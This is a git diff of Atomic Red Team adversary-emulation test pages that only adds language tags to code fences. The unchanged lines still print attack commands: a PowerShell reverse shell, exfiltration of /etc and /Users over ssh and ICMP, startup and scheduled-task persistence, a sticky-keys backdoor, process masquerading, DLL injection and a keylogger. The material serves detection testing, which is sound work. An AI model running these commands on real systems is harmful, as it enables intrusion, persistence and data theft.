@@ -194,7 +208,9 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] $pieces = $localip.split(".") $firstOctet = $pieces[0] diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 0961be6a..2665c4db 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -25,7 +25,9 @@ Encrypt data for exiltration #### Attack Commands: Run with `sh`! -``` + + +```sh mkdir /tmp/victim-files cd /tmp/victim-files touch a b c d e f g @@ -38,7 +40,7 @@ ls -l ``` #### Cleanup Commands: -``` +```sh rm -Rf /tmp/victim-files ``` @@ -58,7 +60,9 @@ rar a -p"blue" hello.rar (VARIANT) #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir .\tmp\victim-files cd .\tmp\victim-files echo "This file will be encrypted" > .\encrypted_file.txt @@ -90,7 +94,9 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT) #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd path=%path%;"C:\Program Files (x86)\winzip" mkdir .\tmp\victim-files cd .\tmp\victim-files @@ -101,14 +107,15 @@ dir + #### Dependencies: Run with `powershell`! ##### Description: Winzip must be installed ##### Check Prereq Commands: -``` +```powershell cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` ##### Get Prereq Commands: -``` +```powershell if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue cmd /c "$env:Temp\winzip.exe" @@ -129,7 +136,9 @@ Note: Requires 7zip installation #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir $PathToAtomicsFolder\T1022\victim-files cd $PathToAtomicsFolder\T1022\victim-files echo "This file will be encrypted" > .\encrypted_file.txt diff --git a/atomics/T1023/T1023.md b/atomics/T1023/T1023.md index f57957fc..bb1e7be3 100644 
--- a/atomics/T1023/T1023.md +++ b/atomics/T1023/T1023.md @@ -25,7 +25,9 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1 ``` @@ -45,7 +47,9 @@ LNK file to launch CMD placed in startup folder #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $Shell = New-Object -ComObject ("WScript.Shell") $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk") $ShortCut.TargetPath="cmd.exe" @@ -64,7 +68,7 @@ $ShortCut.Save() ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore ``` diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index bf035e79..c5e566ce 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -29,7 +29,9 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip #### Attack Commands: Run with `sh`! -``` + + +```sh sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh chmod +x /tmp/art.sh @@ -57,7 +59,9 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) 
@@ -89,7 +93,9 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) @@ -100,7 +106,7 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} ``` diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index eb5723d3..e8a6fba1 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -25,7 +25,9 @@ Powershell Enable WinRM #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Enable-PSRemoting -Force ``` @@ -54,7 +56,9 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` @@ -81,7 +85,9 @@ Utilize WMIC to start remote process #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ``` @@ -108,7 +114,9 @@ Utilize psexec to start remote process #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe ``` 
@@ -134,7 +142,9 @@ Execute Invoke-command on remote host #### Attack Commands: Run with `powershell`! -``` + + +```powershell invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} ``` diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index c9612687..f7f99cfa 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -17,7 +17,9 @@ Take a file/directory, split it into 5Mb chunks #### Attack Commands: Run with `sh`! -``` + + +```sh cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 split -b 5000000 /tmp/victim-whole-file diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md index 48f6fd76..de2797d1 100644 --- a/atomics/T1031/T1031.md +++ b/atomics/T1031/T1031.md @@ -22,13 +22,15 @@ and will then revert the binPath change, restoring Fax to its original state. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax ``` #### Cleanup Commands: -``` +```cmd sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" ``` diff --git a/atomics/T1032/T1032.md b/atomics/T1032/T1032.md index 1271d31a..7d87e29a 100644 --- a/atomics/T1032/T1032.md +++ b/atomics/T1032/T1032.md @@ -26,7 +26,9 @@ https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client- #### Attack Commands: Run with `powershell`! -``` + + +```powershell $server_ip = #{server_ip} $server_port = #{server_port} $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port}) diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 9d2877df..d179b0af 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -34,7 +34,9 @@ Identify System owner or users on an endpoint #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"#{computer_name}" 
@@ -61,7 +63,9 @@ Identify System owner or users on an endpoint #### Attack Commands: Run with `sh`! -``` + + +```sh users w who diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md index 5e4ce58f..74d8f021 100644 --- a/atomics/T1035/T1035.md +++ b/atomics/T1035/T1035.md @@ -25,7 +25,9 @@ Creates a service specifying an aribrary command and executes it. When executing #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} sc.exe delete #{service_name} @@ -54,20 +56,23 @@ Will run a command on a remote host #### Attack Commands: Run with `powershell`! -``` + + +```powershell #{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe" ``` + #### Dependencies: Run with `powershell`! ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index 1a9da0c9..9b4791bb 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -47,13 +47,15 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe ``` #### Cleanup Commands: -``` +```cmd del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ``` 
@@ -72,7 +74,9 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro #### Attack Commands: Run with `sh`! -``` + + +```sh cp /bin/sh /tmp/crond /tmp/crond ``` @@ -93,13 +97,15 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y cmd.exe /c %APPDATA%\notepad.exe /B ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ``` @@ -118,13 +124,15 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y cmd.exe /c %APPDATA%\svchost.exe /B ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ``` @@ -143,13 +151,15 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y cmd.exe /K %APPDATA%\taskhostw.exe ``` #### Cleanup Commands: -``` +```cmd del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ``` 
@@ -174,26 +184,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r #### Attack Commands: Run with `powershell`! -``` + + +```powershell copy #{inputfile} #{outputfile} $myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id Stop-Process -ID $myT1036 ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` + #### Dependencies: Run with `powershell`! ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" ``` @@ -218,14 +231,16 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq #### Attack Commands: Run with `powershell`! -``` + + +```powershell copy #{inputfile} #{outputfile} $myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id Stop-Process -ID $myT1036 ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` @@ -245,13 +260,15 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy C:\Windows\System32\cmd.exe C:\lsm.exe C:\lsm.exe /c echo T1036 > C:\T1036.txt ``` #### Cleanup Commands: -``` +```cmd del C:\T1036.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1 ``` diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md index bf4e9f08..30738c27 100644 --- a/atomics/T1037/T1037.md +++ b/atomics/T1037/T1037.md 
@@ -41,13 +41,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo cmd /c "#{script_command}" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" ``` #### Cleanup Commands: -``` +```cmd REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f del #{script_path} >nul 2>nul del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul @@ -68,13 +70,15 @@ Run an exe on user logon or system startup #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" ``` #### Cleanup Commands: -``` +```cmd schtasks /delete /tn "T1037_OnLogon" /f schtasks /delete /tn "T1037_OnStartup" /f ``` @@ -126,7 +130,9 @@ vbs files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" @@ -134,7 +140,7 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore ``` 
@@ -154,7 +160,9 @@ jse files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" @@ -162,7 +170,7 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore ``` @@ -182,7 +190,9 @@ bat files can be placed in and ran from the startup folder to maintain persistan #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" @@ -190,7 +200,7 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats ``` #### Cleanup Commands: -``` +```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore ``` diff --git a/atomics/T1038/T1038.md b/atomics/T1038/T1038.md index 49876672..b334bec1 100644 
--- a/atomics/T1038/T1038.md +++ b/atomics/T1038/T1038.md @@ -27,14 +27,16 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit ``` #### Cleanup Commands: -``` +```cmd del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1 ``` diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index dba12d75..2bba8e8c 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -32,7 +32,9 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -58,7 +60,9 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -85,7 +89,9 @@ installed, along with WinPCAP. Windump will require the windump executable. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 c:\windump.exe ``` @@ -112,7 +118,9 @@ installed, along with WinPCAP. Windump will require the windump executable. #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell & "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 & c:\windump.exe ``` diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md index 7ed48815..8b4104c6 100644 --- a/atomics/T1042/T1042.md +++ b/atomics/T1042/T1042.md 
@@ -30,7 +30,9 @@ Change Default File Association From cmd.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" ``` diff --git a/atomics/T1044/T1044.md b/atomics/T1044/T1044.md index 36808ac2..79506791 100644 --- a/atomics/T1044/T1044.md +++ b/atomics/T1044/T1044.md @@ -34,7 +34,9 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-WmiObject win32_service | select PathName get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl" ``` diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index d5d596ac..629440c3 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -21,7 +21,9 @@ Scan ports to check for listening ports #### Attack Commands: Run with `sh`! -``` + + +```sh for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; @@ -51,7 +53,9 @@ Scan ports to check for listening ports with Nmap. #### Attack Commands: Run with `sh`! -``` + + +```sh nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port} diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index d9535442..0b0b8588 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -29,7 +29,9 @@ WMI List User Accounts #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic useraccount get /ALL ``` @@ -49,7 +51,9 @@ WMI List Processes #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic process get caption,executablepath,commandline ``` @@ -69,7 +73,9 @@ WMI List Software #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic qfe get description,installedOn /format:csv ``` 
@@ -95,7 +101,9 @@ WMI List Remote Services #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") ``` @@ -120,7 +128,9 @@ This test uses wmic.exe to execute a process on the local host. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic process call create #{process_to_execute} ``` @@ -146,7 +156,9 @@ This test uses wmic.exe to execute a process on a remote host. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd wmic /node:"#{node}" process call create #{process_to_execute} ``` diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 9f1d8c8f..e08b6965 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -45,7 +45,9 @@ Remote to Local #### Attack Commands: Run with `sh`! -``` + + +```sh ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ``` @@ -74,7 +76,9 @@ Local to Remote #### Attack Commands: Run with `sh`! -``` + + +```sh tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ``` @@ -130,7 +134,9 @@ Exfiltration of specified file over ICMP protocol. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ``` diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index d8952b50..8014cd20 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -31,7 +31,9 @@ Get a listing of network connections. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netstat net use net sessions @@ -53,7 +55,9 @@ Get a listing of network connections. #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-NetTCPConnection ``` 
@@ -73,7 +77,9 @@ Get a listing of network connections. #### Attack Commands: Run with `sh`! -``` + + +```sh netstat who -a ``` diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md index 8f10bf5c..d6b47e4d 100644 --- a/atomics/T1050/T1050.md +++ b/atomics/T1050/T1050.md @@ -27,26 +27,29 @@ Installs A Local Service #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} ``` #### Cleanup Commands: -``` +```cmd sc.exe stop #{service_name} sc.exe delete #{service_name} ``` + #### Dependencies: Run with `powershell`! ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` 
@@ -71,27 +74,30 @@ Installs A Local Service via PowerShell #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null Start-Service -Name "#{service_name}" ``` #### Cleanup Commands: -``` +```powershell Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} ``` + #### Dependencies: Run with `powershell`! ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md index 9d85c1f9..1dccf205 100644 --- a/atomics/T1053/T1053.md +++ b/atomics/T1053/T1053.md @@ -26,7 +26,9 @@ Note: deprecated in Windows 8+ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd at 13:20 /interactive cmd ``` @@ -51,12 +53,14 @@ at 13:20 /interactive cmd #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ``` #### Cleanup Commands: -``` +```cmd SCHTASKS /Delete /TN spawn /F ``` @@ -84,12 +88,14 @@ Create a task on a remote system #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ``` #### Cleanup Commands: -``` +```cmd SCHTASKS /Delete /TN "Atomic task" /F ``` 
@@ -109,7 +115,9 @@ These could be considered "fileless" scheduled task creation. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $Action = New-ScheduledTaskAction -Execute "calc.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest @@ -119,7 +127,7 @@ Register-ScheduledTask AtomicTask -InputObject $object ``` #### Cleanup Commands: -``` +```powershell Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 4dbe3869..c8ec9e94 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -54,21 +54,24 @@ Windows 10 Utility To Inject DLLS #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} ``` + #### Dependencies: Run with `powershell`! ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" ``` @@ -93,7 +96,9 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/ #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $mypid = #{process_id} Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload} ``` @@ -119,7 +124,9 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter #### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -``` + + +```bash echo #{path_to_shared_library} > /etc/ld.so.preload ``` 
@@ -144,7 +151,9 @@ This test injects a shared object library via the LD_PRELOAD environment variabl #### Attack Commands: Run with `bash`! -``` + + +```bash LD_PRELOAD=#{path_to_shared_library} ls ``` @@ -176,7 +185,9 @@ Excercises Five Techniques #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd .\bin\#{exe_binary} ``` @@ -197,13 +208,15 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt ``` #### Cleanup Commands: -``` +```cmd del C:\T1055.txt >nul 2>&1 del C:\svchost.exe >nul 2>&1 ``` diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md index debe8295..d99354fa 100644 --- a/atomics/T1056/T1056.md +++ b/atomics/T1056/T1056.md @@ -30,13 +30,15 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} ``` #### Cleanup Commands: -``` +```powershell Remove-Item $env:TEMP\key.log -ErrorAction Ignore ``` diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 6cbbd41d..5851197b 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -32,7 +32,9 @@ Utilize ps to identify processes #### Attack Commands: Run with `sh`! -``` + + +```sh ps >> #{output_file} ps aux >> #{output_file} ``` @@ -53,7 +55,9 @@ Utilize tasklist to identify processes #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd tasklist ``` diff --git a/atomics/T1058/T1058.md b/atomics/T1058/T1058.md index c83d2f22..c256e65a 100644 --- a/atomics/T1058/T1058.md +++ b/atomics/T1058/T1058.md 
